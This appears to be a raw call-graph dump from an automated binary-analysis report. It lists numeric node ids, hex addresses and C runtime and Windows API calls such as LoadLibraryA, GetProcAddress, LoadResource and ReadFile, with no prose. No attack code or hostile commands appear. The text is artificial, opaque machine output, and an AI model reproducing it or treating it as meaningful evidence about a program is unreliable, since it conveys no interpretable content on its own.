97715 7792c0 97181->97715 97183 7791bf 97184 790f36 Mailbox 59 API calls 97183->97184 97185 773944 97183->97185 97184->97185 97186 779040 97185->97186 97187 7af4d5 97186->97187 97189 779057 97186->97189 97187->97189 97725 778d3b 59 API calls Mailbox 97187->97725 97190 7791a0 97189->97190 97191 779158 97189->97191 97194 77915f 97189->97194 97724 779e9c 60 API calls Mailbox 97190->97724 97193 790f36 Mailbox 59 API calls 97191->97193 97193->97194 97194->96990 97196 775045 85 API calls 97195->97196 97197 7d9673 97196->97197 97726 7d97dd 97197->97726 97200 77506b 74 API calls 97201 7d96a0 97200->97201 97202 77506b 74 API calls 97201->97202 97203 7d96b0 97202->97203 97204 77506b 74 API calls 97203->97204 97205 7d96cb 97204->97205 97206 77506b 74 API calls 97205->97206 97207 7d96e6 97206->97207 97208 775045 85 API calls 97207->97208 97209 7d96fd 97208->97209 97210 79588c __crtGetStringTypeA_stat 58 API calls 97209->97210 97211 7d9704 97210->97211 97212 79588c __crtGetStringTypeA_stat 58 API calls 97211->97212 97213 7d970e 97212->97213 97214 77506b 74 API calls 97213->97214 97215 7d9722 97214->97215 97216 7d91b2 GetSystemTimeAsFileTime 97215->97216 97217 7d9735 97216->97217 97218 7d975f 97217->97218 97219 7d974a 97217->97219 97221 7d9765 97218->97221 97222 7d97c4 97218->97222 97220 792ed5 _free 58 API calls 97219->97220 97224 7d9750 97220->97224 97732 7d8baf 97221->97732 97223 792ed5 _free 58 API calls 97222->97223 97228 7ad2f1 97223->97228 97226 792ed5 _free 58 API calls 97224->97226 97226->97228 97228->96929 97230 774faa 97228->97230 97229 792ed5 _free 58 API calls 97229->97228 97231 774fb4 97230->97231 97232 774fbb 97230->97232 97233 795516 __fcloseall 83 API calls 97231->97233 97234 774fdb FreeLibrary 97232->97234 97235 774fca 97232->97235 97233->97232 97234->97235 97235->96929 97237 777faf 59 API calls 97236->97237 97238 777b5d 97237->97238 97238->97118 97288 774d61 97239->97288 97242 774d61 2 API calls 97245 774d3a 97242->97245 97243 774d53 97246 7953cb 97243->97246 97244 774d4a FreeLibrary 97244->97243 97245->97243 97245->97244 97292 7953e0 97246->97292 97248 774f5c 97248->97133 97248->97134 97450 774d94 97249->97450 97252 774ced 97254 774cff FreeLibrary 97252->97254 97255 774d08 97252->97255 97253 774d94 2 API calls 97253->97252 97254->97255 97256 774dd0 97255->97256 97257 790f36 Mailbox 59 API calls 97256->97257 97258 774de5 97257->97258 97259 77538e 59 API calls 97258->97259 97260 774df1 _memmove 97259->97260 97261 774e2c 97260->97261 97263 774f21 97260->97263 97264 774ee9 97260->97264 97262 775027 69 API calls 97261->97262 97271 774e35 97262->97271 97465 7d99c4 95 API calls 97263->97465 97454 774fe9 CreateStreamOnHGlobal 97264->97454 97267 77506b 74 API calls 97267->97271 97269 774ec9 97269->97142 97270 7adc00 97272 775045 85 API calls 97270->97272 97271->97267 97271->97269 97271->97270 97460 775045 97271->97460 97273 7adc14 97272->97273 97274 77506b 74 API calls 97273->97274 97274->97269 97276 77507d 97275->97276 97277 7add26 97275->97277 97489 795752 97276->97489 97280 7d91b2 97687 7d9008 97280->97687 97282 7d91c8 97282->97149 97284 775036 97283->97284 97285 7adce9 97283->97285 97692 795dd0 97284->97692 97287 77503e 97287->97151 97289 774d2e 97288->97289 97290 774d6a LoadLibraryA 97288->97290 97289->97242 97289->97245 97290->97289 97291 774d7b GetProcAddress 97290->97291 97291->97289 97294 7953ec __setmbcp 97292->97294 97293 7953ff 97341 798ca8 58 API calls __getptd_noexit 97293->97341 97294->97293 97297 795430 97294->97297 97296 795404 97342 798f36 9 API calls _wprintf 97296->97342 97311 7a0668 97297->97311 97300 795435 97301 79544b 97300->97301 97302 79543e 97300->97302 97304 795475 97301->97304 97305 795455 97301->97305 97343 798ca8 58 API calls __getptd_noexit 97302->97343 97326 7a0787 97304->97326 97344 798ca8 58 API calls __getptd_noexit 97305->97344 97307 79540f @_EH4_CallFilterFunc@8 __setmbcp 97307->97248 97312 7a0674 __setmbcp 97311->97312 97313 799d8b __lock 58 API calls 97312->97313 97323 7a0682 97313->97323 97314 7a06fd 97351 79899d 58 API calls 2 library calls 97314->97351 97317 7a0704 97324 7a06f6 97317->97324 97352 799fab InitializeCriticalSectionAndSpinCount 97317->97352 97318 7a0773 __setmbcp 97318->97300 97320 799e13 __mtinitlocknum 58 API calls 97320->97323 97322 7a072a EnterCriticalSection 97322->97324 97323->97314 97323->97320 97323->97324 97349 796dcd 59 API calls __lock 97323->97349 97350 796e37 LeaveCriticalSection LeaveCriticalSection _doexit 97323->97350 97346 7a077e 97324->97346 97327 7a07a7 __wopenfile 97326->97327 97328 7a07c1 97327->97328 97340 7a097c 97327->97340 97359 79394b 60 API calls 3 library calls 97327->97359 97357 798ca8 58 API calls __getptd_noexit 97328->97357 97330 7a07c6 97358 798f36 9 API calls _wprintf 97330->97358 97332 795480 97345 7954a2 LeaveCriticalSection LeaveCriticalSection _fseek 97332->97345 97333 7a09df 97354 7a8721 97333->97354 97336 7a0975 97336->97340 97360 79394b 60 API calls 3 library calls 97336->97360 97338 7a0994 97338->97340 97361 79394b 60 API calls 3 library calls 97338->97361 97340->97328 97340->97333 97341->97296 97342->97307 97343->97307 97344->97307 97345->97307 97353 799ef5 LeaveCriticalSection 97346->97353 97348 7a0785 97348->97318 97349->97323 97350->97323 97351->97317 97352->97322 97353->97348 97362 7a7f05 97354->97362 97356 7a873a 97356->97332 97357->97330 97358->97332 97359->97336 97360->97338 97361->97340 97363 7a7f11 __setmbcp 97362->97363 97364 7a7f27 97363->97364 97367 7a7f5d 97363->97367 97447 798ca8 58 API calls __getptd_noexit 97364->97447 97366 7a7f2c 97448 798f36 9 API calls _wprintf 97366->97448 97373 7a7fce 97367->97373 97370 7a7f79 97449 7a7fa2 LeaveCriticalSection __unlock_fhandle 97370->97449 97372 7a7f36 __setmbcp 97372->97356 97374 7a7fee 97373->97374 97375 79465a __wsopen_nolock 58 API calls 97374->97375 97378 7a800a 97375->97378 97376 798f46 __invoke_watson 8 API calls 97377 7a8720 97376->97377 97379 7a7f05 __wsopen_helper 103 API calls 97377->97379 97380 7a8044 97378->97380 97386 7a8067 97378->97386 97395 7a8141 97378->97395 97381 7a873a 97379->97381 97382 798c74 __read 58 API calls 97380->97382 97381->97370 97383 7a8049 97382->97383 97384 798ca8 __setmbcp 58 API calls 97383->97384 97385 7a8056 97384->97385 97388 798f36 _wprintf 9 API calls 97385->97388 97387 7a8125 97386->97387 97389 7a8103 97386->97389 97390 798c74 __read 58 API calls 97387->97390 97415 7a8060 97388->97415 97396 79d414 __alloc_osfhnd 61 API calls 97389->97396 97391 7a812a 97390->97391 97392 798ca8 __setmbcp 58 API calls 97391->97392 97393 7a8137 97392->97393 97394 798f36 _wprintf 9 API calls 97393->97394 97394->97395 97395->97376 97397 7a81d1 97396->97397 97398 7a81db 97397->97398 97399 7a81fe 97397->97399 97400 798c74 __read 58 API calls 97398->97400 97401 7a7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97399->97401 97402 7a81e0 97400->97402 97409 7a8220 97401->97409 97404 798ca8 __setmbcp 58 API calls 97402->97404 97403 7a829e GetFileType 97407 7a82eb 97403->97407 97408 7a82a9 GetLastError 97403->97408 97406 7a81ea 97404->97406 97405 7a826c GetLastError 97410 798c87 __dosmaperr 58 API calls 97405->97410 97411 798ca8 __setmbcp 58 API calls 97406->97411 97419 79d6aa __set_osfhnd 59 API calls 97407->97419 97412 798c87 __dosmaperr 58 API calls 97408->97412 97409->97403 97409->97405 97413 7a7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97409->97413 97414 7a8291 97410->97414 97411->97415 97416 7a82d0 CloseHandle 97412->97416 97418 7a8261 97413->97418 97421 798ca8 __setmbcp 58 API calls 97414->97421 97415->97370 97416->97414 97417 7a82de 97416->97417 97420 798ca8 __setmbcp 58 API calls 97417->97420 97418->97403 97418->97405 97424 7a8309 97419->97424 97422 7a82e3 97420->97422 97421->97395 97422->97414 97423 7a84c4 97423->97395 97426 7a8697 CloseHandle 97423->97426 97424->97423 97425 7a1a41 __lseeki64_nolock 60 API calls 97424->97425 97442 7a838a 97424->97442 97427 7a8373 97425->97427 97428 7a7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97426->97428 97429 798c74 __read 58 API calls 97427->97429 97427->97442 97430 7a86be 97428->97430 97429->97442 97431 7a86f2 97430->97431 97432 7a86c6 GetLastError 97430->97432 97431->97395 97433 798c87 __dosmaperr 58 API calls 97432->97433 97434 7a86d2 97433->97434 97438 79d5bd __free_osfhnd 59 API calls 97434->97438 97435 7a0c5d __close_nolock 61 API calls 97435->97442 97436 7a0fdb 70 API calls __read_nolock 97436->97442 97437 7a83bc 97439 7a9922 __chsize_nolock 82 API calls 97437->97439 97437->97442 97438->97431 97439->97437 97440 79da06 __write 78 API calls 97440->97442 97441 7a8541 97443 7a0c5d __close_nolock 61 API calls 97441->97443 97442->97423 97442->97435 97442->97436 97442->97437 97442->97440 97442->97441 97445 7a1a41 60 API calls __lseeki64_nolock 97442->97445 97444 7a8548 97443->97444 97446 798ca8 __setmbcp 58 API calls 97444->97446 97445->97442 97446->97395 97447->97366 97448->97372 97449->97372 97451 774ce1 97450->97451 97452 774d9d LoadLibraryA 97450->97452 97451->97252 97451->97253 97452->97451 97453 774dae GetProcAddress 97452->97453 97453->97451 97455 775003 FindResourceExW 97454->97455 97459 775020 97454->97459 97456 7adc8c LoadResource 97455->97456 97455->97459 97457 7adca1 SizeofResource 97456->97457 97456->97459 97458 7adcb5 LockResource 97457->97458 97457->97459 97458->97459 97459->97261 97461 775054 97460->97461 97462 7add04 97460->97462 97466 7959bd 97461->97466 97464 775062 97464->97271 97465->97261 97467 7959c9 __setmbcp 97466->97467 97468 7959db 97467->97468 97470 795a01 97467->97470 97479 798ca8 58 API calls __getptd_noexit 97468->97479 97481 796d8e 97470->97481 97471 7959e0 97480 798f36 9 API calls _wprintf 97471->97480 97474 795a07 97487 79592e 83 API calls 5 library calls 97474->97487 97476 795a16 97488 795a38 LeaveCriticalSection LeaveCriticalSection _fseek 97476->97488 97478 7959eb __setmbcp 97478->97464 97479->97471 97480->97478 97482 796d9e 97481->97482 97483 796dc0 EnterCriticalSection 97481->97483 97482->97483 97484 796da6 97482->97484 97485 796db6 97483->97485 97486 799d8b __lock 58 API calls 97484->97486 97485->97474 97486->97485 97487->97476 97488->97478 97492 79576d 97489->97492 97491 77508e 97491->97280 97493 795779 __setmbcp 97492->97493 97494 7957b4 __setmbcp 97493->97494 97495 7957bc 97493->97495 97496 79578f _memset 97493->97496 97494->97491 97497 796d8e __lock_file 59 API calls 97495->97497 97519 798ca8 58 API calls __getptd_noexit 97496->97519 97498 7957c2 97497->97498 97505 79558d 97498->97505 97501 7957a9 97520 798f36 9 API calls _wprintf 97501->97520 97507 7955a8 _memset 97505->97507 97512 7955c3 97505->97512 97506 7955b3 97617 798ca8 58 API calls __getptd_noexit 97506->97617 97507->97506 97507->97512 97514 795603 97507->97514 97509 7955b8 97618 798f36 9 API calls _wprintf 97509->97618 97521 7957f6 LeaveCriticalSection LeaveCriticalSection _fseek 97512->97521 97513 795714 _memset 97620 798ca8 58 API calls __getptd_noexit 97513->97620 97514->97512 97514->97513 97522 794856 97514->97522 97529 7a0fdb 97514->97529 97597 7a0d27 97514->97597 97619 7a0e48 58 API calls 4 library calls 97514->97619 97519->97501 97520->97494 97521->97494 97523 794860 97522->97523 97524 794875 97522->97524 97621 798ca8 58 API calls __getptd_noexit 97523->97621 97524->97514 97526 794865 97622 798f36 9 API calls _wprintf 97526->97622 97528 794870 97528->97514 97530 7a0ffc 97529->97530 97531 7a1013 97529->97531 97632 798c74 58 API calls __getptd_noexit 97530->97632 97533 7a174b 97531->97533 97538 7a104d 97531->97538 97648 798c74 58 API calls __getptd_noexit 97533->97648 97535 7a1001 97633 798ca8 58 API calls __getptd_noexit 97535->97633 97536 7a1750 97649 798ca8 58 API calls __getptd_noexit 97536->97649 97540 7a1055 97538->97540 97546 7a106c 97538->97546 97634 798c74 58 API calls __getptd_noexit 97540->97634 97541 7a1061 97650 798f36 9 API calls _wprintf 97541->97650 97542 7a1008 97542->97514 97544 7a105a 97635 798ca8 58 API calls __getptd_noexit 97544->97635 97546->97542 97547 7a1081 97546->97547 97550 7a109b 97546->97550 97552 7a10b9 97546->97552 97636 798c74 58 API calls __getptd_noexit 97547->97636 97550->97547 97551 7a10a6 97550->97551 97623 7a5deb 97551->97623 97637 79899d 58 API calls 2 library calls 97552->97637 97554 7a10c9 97556 7a10ec 97554->97556 97557 7a10d1 97554->97557 97640 7a1a41 60 API calls 3 library calls 97556->97640 97638 798ca8 58 API calls __getptd_noexit 97557->97638 97558 7a11ba 97560 7a1233 ReadFile 97558->97560 97565 7a11d0 GetConsoleMode 97558->97565 97563 7a1713 GetLastError 97560->97563 97564 7a1255 97560->97564 97562 7a10d6 97639 798c74 58 API calls __getptd_noexit 97562->97639 97567 7a1720 97563->97567 97573 7a1213 97563->97573 97564->97563 97571 7a1225 97564->97571 97568 7a1230 97565->97568 97569 7a11e4 97565->97569 97646 798ca8 58 API calls __getptd_noexit 97567->97646 97568->97560 97569->97568 97572 7a11ea ReadConsoleW 97569->97572 97579 7a14f7 97571->97579 97580 7a1219 97571->97580 97582 7a128a 97571->97582 97572->97571 97575 7a120d GetLastError 97572->97575 97573->97580 97641 798c87 58 API calls 3 library calls 97573->97641 97574 7a1725 97647 798c74 58 API calls __getptd_noexit 97574->97647 97575->97573 97578 792ed5 _free 58 API calls 97578->97542 97579->97580 97587 7a15fd ReadFile 97579->97587 97580->97542 97580->97578 97583 7a12f6 ReadFile 97582->97583 97588 7a1377 97582->97588 97584 7a1317 GetLastError 97583->97584 97595 7a1321 97583->97595 97584->97595 97585 7a1434 97591 7a13e4 MultiByteToWideChar 97585->97591 97644 7a1a41 60 API calls 3 library calls 97585->97644 97586 7a1424 97643 798ca8 58 API calls __getptd_noexit 97586->97643 97590 7a1620 GetLastError 97587->97590 97596 7a162e 97587->97596 97588->97580 97588->97585 97588->97586 97588->97591 97590->97596 97591->97575 97591->97580 97595->97582 97642 7a1a41 60 API calls 3 library calls 97595->97642 97596->97579 97645 7a1a41 60 API calls 3 library calls 97596->97645 97598 7a0d32 97597->97598 97602 7a0d47 97597->97602 97684 798ca8 58 API calls __getptd_noexit 97598->97684 97600 7a0d37 97685 798f36 9 API calls _wprintf 97600->97685 97603 7a0d7c 97602->97603 97609 7a0d42 97602->97609 97686 7a6164 58 API calls __malloc_crt 97602->97686 97605 794856 __flsbuf 58 API calls 97603->97605 97606 7a0d90 97605->97606 97651 7a0ec7 97606->97651 97608 7a0d97 97608->97609 97610 794856 __flsbuf 58 API calls 97608->97610 97609->97514 97611 7a0dba 97610->97611 97611->97609 97612 794856 __flsbuf 58 API calls 97611->97612 97613 7a0dc6 97612->97613 97613->97609 97614 794856 __flsbuf 58 API calls 97613->97614 97615 7a0dd3 97614->97615 97616 794856 __flsbuf 58 API calls 97615->97616 97616->97609 97617->97509 97618->97512 97619->97514 97620->97509 97621->97526 97622->97528 97624 7a5e03 97623->97624 97625 7a5df6 97623->97625 97628 7a5e0f 97624->97628 97629 798ca8 __setmbcp 58 API calls 97624->97629 97626 798ca8 __setmbcp 58 API calls 97625->97626 97627 7a5dfb 97626->97627 97627->97558 97628->97558 97630 7a5e30 97629->97630 97631 798f36 _wprintf 9 API calls 97630->97631 97631->97627 97632->97535 97633->97542 97634->97544 97635->97541 97636->97544 97637->97554 97638->97562 97639->97542 97640->97551 97641->97580 97642->97595 97643->97580 97644->97591 97645->97596 97646->97574 97647->97580 97648->97536 97649->97541 97650->97542 97652 7a0ed3 __setmbcp 97651->97652 97653 7a0ee0 97652->97653 97654 7a0ef7 97652->97654 97656 798c74 __read 58 API calls 97653->97656 97655 7a0fbb 97654->97655 97657 7a0f0b 97654->97657 97658 798c74 __read 58 API calls 97655->97658 97659 7a0ee5 97656->97659 97660 7a0f29 97657->97660 97661 7a0f36 97657->97661 97662 7a0f2e 97658->97662 97663 798ca8 __setmbcp 58 API calls 97659->97663 97664 798c74 __read 58 API calls 97660->97664 97665 7a0f58 97661->97665 97666 7a0f43 97661->97666 97669 798ca8 __setmbcp 58 API calls 97662->97669 97678 7a0eec __setmbcp 97663->97678 97664->97662 97668 79d386 ___lock_fhandle 59 API calls 97665->97668 97667 798c74 __read 58 API calls 97666->97667 97670 7a0f48 97667->97670 97671 7a0f5e 97668->97671 97672 7a0f50 97669->97672 97673 798ca8 __setmbcp 58 API calls 97670->97673 97674 7a0f71 97671->97674 97675 7a0f84 97671->97675 97676 798f36 _wprintf 9 API calls 97672->97676 97673->97672 97679 7a0fdb __read_nolock 70 API calls 97674->97679 97677 798ca8 __setmbcp 58 API calls 97675->97677 97676->97678 97681 7a0f89 97677->97681 97678->97608 97680 7a0f7d 97679->97680 97683 7a0fb3 __read LeaveCriticalSection 97680->97683 97682 798c74 __read 58 API calls 97681->97682 97682->97680 97683->97678 97684->97600 97685->97609 97686->97603 97690 79537a GetSystemTimeAsFileTime 97687->97690 97689 7d9017 97689->97282 97691 7953a8 __aulldiv 97690->97691 97691->97689 97693 795ddc __setmbcp 97692->97693 97694 795dee 97693->97694 97695 795e03 97693->97695 97706 798ca8 58 API calls __getptd_noexit 97694->97706 97697 796d8e __lock_file 59 API calls 97695->97697 97699 795e09 97697->97699 97698 795df3 97707 798f36 9 API calls _wprintf 97698->97707 97708 795a40 67 API calls 7 library calls 97699->97708 97702 795dfe __setmbcp 97702->97287 97703 795e14 97709 795e34 LeaveCriticalSection LeaveCriticalSection _fseek 97703->97709 97705 795e26 97705->97702 97706->97698 97707->97702 97708->97703 97709->97705 97710->97156 97711->97171 97712->97173 97713->97170 97714->97179 97716 7792c9 Mailbox 97715->97716 97717 7af4f8 97716->97717 97722 7792d3 97716->97722 97719 790f36 Mailbox 59 API calls 97717->97719 97718 7792da 97718->97183 97720 7af504 97719->97720 97722->97718 97723 779df0 59 API calls Mailbox 97722->97723 97723->97722 97724->97194 97725->97189 97731 7d97f1 __tzset_nolock _wcscmp 97726->97731 97727 77506b 74 API calls 97727->97731 97728 7d9685 97728->97200 97728->97228 97729 7d91b2 GetSystemTimeAsFileTime 97729->97731 97730 775045 85 API calls 97730->97731 97731->97727 97731->97728 97731->97729 97731->97730 97733 7d8bc8 97732->97733 97734 7d8bba 97732->97734 97736 7d8c0d 97733->97736 97737 7953cb 115 API calls 97733->97737 97747 7d8bd1 97733->97747 97735 7953cb 115 API calls 97734->97735 97735->97733 97763 7d8e3a 97736->97763 97739 7d8bf2 97737->97739 97739->97736 97741 7d8bfb 97739->97741 97740 7d8c51 97742 7d8c55 97740->97742 97743 7d8c76 97740->97743 97744 795516 __fcloseall 83 API calls 97741->97744 97741->97747 97746 795516 __fcloseall 83 API calls 97742->97746 97751 7d8c62 97742->97751 97767 7d8a52 97743->97767 97744->97747 97746->97751 97747->97229 97749 7d8ca4 97776 7d8cd4 97749->97776 97750 7d8c84 97753 7d8c91 97750->97753 97755 795516 __fcloseall 83 API calls 97750->97755 97751->97747 97752 795516 __fcloseall 83 API calls 97751->97752 97752->97747 97753->97747 97757 795516 __fcloseall 83 API calls 97753->97757 97755->97753 97757->97747 97760 7d8cbf 97760->97747 97762 795516 __fcloseall 83 API calls 97760->97762 97762->97747 97764 7d8e5f 97763->97764 97766 7d8e48 __tzset_nolock _memmove 97763->97766 97765 795752 __fread_nolock 74 API calls 97764->97765 97765->97766 97766->97740 97768 79588c __crtGetStringTypeA_stat 58 API calls 97767->97768 97769 7d8a61 97768->97769 97770 79588c __crtGetStringTypeA_stat 58 API calls 97769->97770 97771 7d8a75 97770->97771 97772 79588c __crtGetStringTypeA_stat 58 API calls 97771->97772 97773 7d8a89 97772->97773 97774 7d8db6 58 API calls 97773->97774 97775 7d8a9c 97773->97775 97774->97775 97775->97749 97775->97750 97783 7d8ce9 97776->97783 97777 7d8da1 97805 7d8fde 97777->97805 97778 7d8aae 74 API calls 97778->97783 97780 7d8cab 97784 7d8db6 97780->97784 97783->97777 97783->97778 97783->97780 97809 7d8b4a 74 API calls 97783->97809 97810 7d8ebb 80 API calls 97783->97810 97785 7d8dc9 97784->97785 97786 7d8dc3 97784->97786 97787 7d8dda 97785->97787 97789 792ed5 _free 58 API calls 97785->97789 97788 792ed5 _free 58 API calls 97786->97788 97790 7d8cb2 97787->97790 97791 792ed5 _free 58 API calls 97787->97791 97788->97785 97789->97787 97790->97760 97792 795516 97790->97792 97791->97790 97793 795522 __setmbcp 97792->97793 97794 79554e 97793->97794 97795 795536 97793->97795 97798 796d8e __lock_file 59 API calls 97794->97798 97802 795546 __setmbcp 97794->97802 97892 798ca8 58 API calls __getptd_noexit 97795->97892 97797 79553b 97893 798f36 9 API calls _wprintf 97797->97893 97800 795560 97798->97800 97876 7954aa 97800->97876 97802->97760 97806 7d8feb 97805->97806 97808 7d8ffc 97805->97808 97811 7949d3 97806->97811 97808->97780 97809->97783 97810->97783 97812 7949df __setmbcp 97811->97812 97813 794a0d __setmbcp 97812->97813 97814 7949fd 97812->97814 97815 794a15 97812->97815 97813->97808 97836 798ca8 58 API calls __getptd_noexit 97814->97836 97817 796d8e __lock_file 59 API calls 97815->97817 97819 794a1b 97817->97819 97818 794a02 97837 798f36 9 API calls _wprintf 97818->97837 97824 79487a 97819->97824 97826 794889 97824->97826 97831 7948a7 97824->97831 97825 794897 97867 798ca8 58 API calls __getptd_noexit 97825->97867 97826->97825 97826->97831 97834 7948c1 _memmove 97826->97834 97828 79489c 97868 798f36 9 API calls _wprintf 97828->97868 97838 794a4d LeaveCriticalSection LeaveCriticalSection _fseek 97831->97838 97833 794856 __flsbuf 58 API calls 97833->97834 97834->97831 97834->97833 97839 79da06 97834->97839 97869 794bad 97834->97869 97875 79af9e 78 API calls 6 library calls 97834->97875 97836->97818 97837->97813 97838->97813 97840 79da12 __setmbcp 97839->97840 97841 79da1f 97840->97841 97842 79da36 97840->97842 97843 798c74 __read 58 API calls 97841->97843 97844 79dad5 97842->97844 97845 79da4a 97842->97845 97847 79da24 97843->97847 97846 798c74 __read 58 API calls 97844->97846 97848 79da68 97845->97848 97849 79da72 97845->97849 97850 79da6d 97846->97850 97851 798ca8 __setmbcp 58 API calls 97847->97851 97852 798c74 __read 58 API calls 97848->97852 97853 79d386 ___lock_fhandle 59 API calls 97849->97853 97855 798ca8 __setmbcp 58 API calls 97850->97855 97862 79da2b __setmbcp 97851->97862 97852->97850 97854 79da78 97853->97854 97856 79da8b 97854->97856 97857 79da9e 97854->97857 97858 79dae1 97855->97858 97859 79daf5 __write_nolock 76 API calls 97856->97859 97861 798ca8 __setmbcp 58 API calls 97857->97861 97860 798f36 _wprintf 9 API calls 97858->97860 97863 79da97 97859->97863 97860->97862 97864 79daa3 97861->97864 97862->97834 97866 79dacd __write LeaveCriticalSection 97863->97866 97865 798c74 __read 58 API calls 97864->97865 97865->97863 97866->97862 97867->97828 97868->97831 97870 794bc0 97869->97870 97874 794be4 97869->97874 97871 794856 __flsbuf 58 API calls 97870->97871 97870->97874 97872 794bdd 97871->97872 97873 79da06 __write 78 API calls 97872->97873 97873->97874 97874->97834 97875->97834 97877 7954b9 97876->97877 97878 7954cd 97876->97878 97925 798ca8 58 API calls __getptd_noexit 97877->97925 97880 7954c9 97878->97880 97882 794bad __flush 78 API calls 97878->97882 97894 795585 LeaveCriticalSection LeaveCriticalSection _fseek 97880->97894 97881 7954be 97926 798f36 9 API calls _wprintf 97881->97926 97884 7954d9 97882->97884 97895 7a0cf7 97884->97895 97887 794856 __flsbuf 58 API calls 97888 7954e7 97887->97888 97899 7a0b82 97888->97899 97890 7954ed 97890->97880 97891 792ed5 _free 58 API calls 97890->97891 97891->97880 97892->97797 97893->97802 97894->97802 97896 7954e1 97895->97896 97897 7a0d04 97895->97897 97896->97887 97897->97896 97898 792ed5 _free 58 API calls 97897->97898 97898->97896 97900 7a0b8e __setmbcp 97899->97900 97901 7a0b9b 97900->97901 97902 7a0bb2 97900->97902 97951 798c74 58 API calls __getptd_noexit 97901->97951 97903 7a0c3d 97902->97903 97905 7a0bc2 97902->97905 97956 798c74 58 API calls __getptd_noexit 97903->97956 97909 7a0bea 97905->97909 97910 7a0be0 97905->97910 97907 7a0ba0 97952 798ca8 58 API calls __getptd_noexit 97907->97952 97927 79d386 97909->97927 97953 798c74 58 API calls __getptd_noexit 97910->97953 97912 7a0be5 97957 798ca8 58 API calls __getptd_noexit 97912->97957 97915 7a0bf0 97917 7a0c0e 97915->97917 97918 7a0c03 97915->97918 97916 7a0c49 97958 798f36 9 API calls _wprintf 97916->97958 97954 798ca8 58 API calls __getptd_noexit 97917->97954 97936 7a0c5d 97918->97936 97922 7a0c09 97955 7a0c35 LeaveCriticalSection __unlock_fhandle 97922->97955 97923 7a0ba7 __setmbcp 97923->97890 97925->97881 97926->97880 97928 79d392 __setmbcp 97927->97928 97929 79d3e1 EnterCriticalSection 97928->97929 97930 799d8b __lock 58 API calls 97928->97930 97931 79d407 __setmbcp 97929->97931 97932 79d3b7 97930->97932 97931->97915 97933 79d3cf 97932->97933 97959 799fab InitializeCriticalSectionAndSpinCount 97932->97959 97960 79d40b LeaveCriticalSection _doexit 97933->97960 97961 79d643 97936->97961 97938 7a0cc1 97974 79d5bd 59 API calls 2 library calls 97938->97974 97939 7a0c6b 97939->97938 97941 79d643 __lseek_nolock 58 API calls 97939->97941 97950 7a0c9f 97939->97950 97944 7a0c96 97941->97944 97942 79d643 __lseek_nolock 58 API calls 97945 7a0cab CloseHandle 97942->97945 97943 7a0cc9 97947 7a0ceb 97943->97947 97975 798c87 58 API calls 3 library calls 97943->97975 97948 79d643 __lseek_nolock 58 API calls 97944->97948 97945->97938 97949 7a0cb7 GetLastError 97945->97949 97947->97922 97948->97950 97949->97938 97950->97938 97950->97942 97951->97907 97952->97923 97953->97912 97954->97922 97955->97923 97956->97912 97957->97916 97958->97923 97959->97933 97960->97929 97962 79d64e 97961->97962 97964 79d663 97961->97964 97963 798c74 __read 58 API calls 97962->97963 97965 79d653 97963->97965 97966 798c74 __read 58 API calls 97964->97966 97968 79d688 97964->97968 97967 798ca8 __setmbcp 58 API calls 97965->97967 97969 79d692 97966->97969 97971 79d65b 97967->97971 97968->97939 97970 798ca8 __setmbcp 58 API calls 97969->97970 97972 79d69a 97970->97972 97971->97939 97973 798f36 _wprintf 9 API calls 97972->97973 97973->97971 97974->97943 97975->97947 97977 7a1ac0 __ftell_nolock 97976->97977 97978 79091e GetLongPathNameW 97977->97978 97979 777d2c 59 API calls 97978->97979 97980 77741d 97979->97980 97981 77716b 97980->97981 97982 7777c7 59 API calls 97981->97982 97983 77717d 97982->97983 97984 7748ae 60 API calls 97983->97984 97985 777188 97984->97985 97986 777193 97985->97986 97990 7aebde 97985->97990 97987 773f84 59 API calls 97986->97987 97989 77719f 97987->97989 98028 7734c2 97989->98028 97992 7aebf8 97990->97992 98034 777a68 61 API calls 97990->98034 97993 7771b2 Mailbox 97993->97007 97995 774f3d 136 API calls 97994->97995 97996 7769ef 97995->97996 97997 7ae38a 97996->97997 97998 774f3d 136 API calls 97996->97998 97999 7d9604 122 API calls 97997->97999 98000 776a03 97998->98000 98001 7ae39f 97999->98001 98000->97997 98002 776a0b 98000->98002 98003 7ae3a3 98001->98003 98004 7ae3c0 98001->98004 98006 776a17 98002->98006 98007 7ae3ab 98002->98007 98008 774faa 84 API calls 98003->98008 98005 790f36 Mailbox 59 API calls 98004->98005 98027 7ae405 Mailbox 98005->98027 98035 776bec 98006->98035 98150 7d4339 90 API calls _wprintf 98007->98150 98008->98007 98012 7ae3b9 98012->98004 98013 7ae5b9 98014 792ed5 _free 58 API calls 98013->98014 98015 7ae5c1 98014->98015 98016 774faa 84 API calls 98015->98016 98017 7ae5ca 98016->98017 98021 792ed5 _free 58 API calls 98017->98021 98022 774faa 84 API calls 98017->98022 98152 7cfad2 89 API calls 4 library calls 98017->98152 98021->98017 98022->98017 98024 777f41 59 API calls 98024->98027 98027->98013 98027->98017 98027->98024 98127 7cfa6e 98027->98127 98130 7d7428 98027->98130 98136 77766f 98027->98136 98144 7774bd 98027->98144 98151 7cf98f 61 API calls 2 library calls 98027->98151 98030 7734d4 98028->98030 98033 7734f3 _memmove 98028->98033 98029 790f36 Mailbox 59 API calls 98032 77350a 98029->98032 98031 790f36 Mailbox 59 API calls 98030->98031 98031->98033 98032->97993 98033->98029 98034->97990 98036 776c15 98035->98036 98037 7ae777 98035->98037 98158 775906 60 API calls Mailbox 98036->98158 98242 7cfad2 89 API calls 4 library calls 98037->98242 98040 776c37 98159 775956 98040->98159 98041 7ae78a 98243 7cfad2 89 API calls 4 library calls 98041->98243 98044 776c54 98046 7777c7 59 API calls 98044->98046 98048 776c60 98046->98048 98047 7ae7a6 98050 776cc1 98047->98050 98170 790ad7 60 API calls __ftell_nolock 98048->98170 98051 7ae7b9 98050->98051 98052 776ccf 98050->98052 98054 775dcf CloseHandle 98051->98054 98055 7777c7 59 API calls 98052->98055 98053 776c6c 98056 7777c7 59 API calls 98053->98056 98057 7ae7c5 98054->98057 98058 776cd8 98055->98058 98059 776c78 98056->98059 98060 774f3d 136 API calls 98057->98060 98061 7777c7 59 API calls 98058->98061 98062 7748ae 60 API calls 98059->98062 98063 7ae7e1 98060->98063 98064 776ce1 98061->98064 98065 776c86 98062->98065 98066 7ae80a 98063->98066 98070 7d9604 122 API calls 98063->98070 98180 7746f9 98064->98180 98171 7759b0 ReadFile SetFilePointerEx 98065->98171 98244 7cfad2 89 API calls 4 library calls 98066->98244 98069 776cb2 98172 775c4e 98069->98172 98074 7ae7fd 98070->98074 98071 776cf8 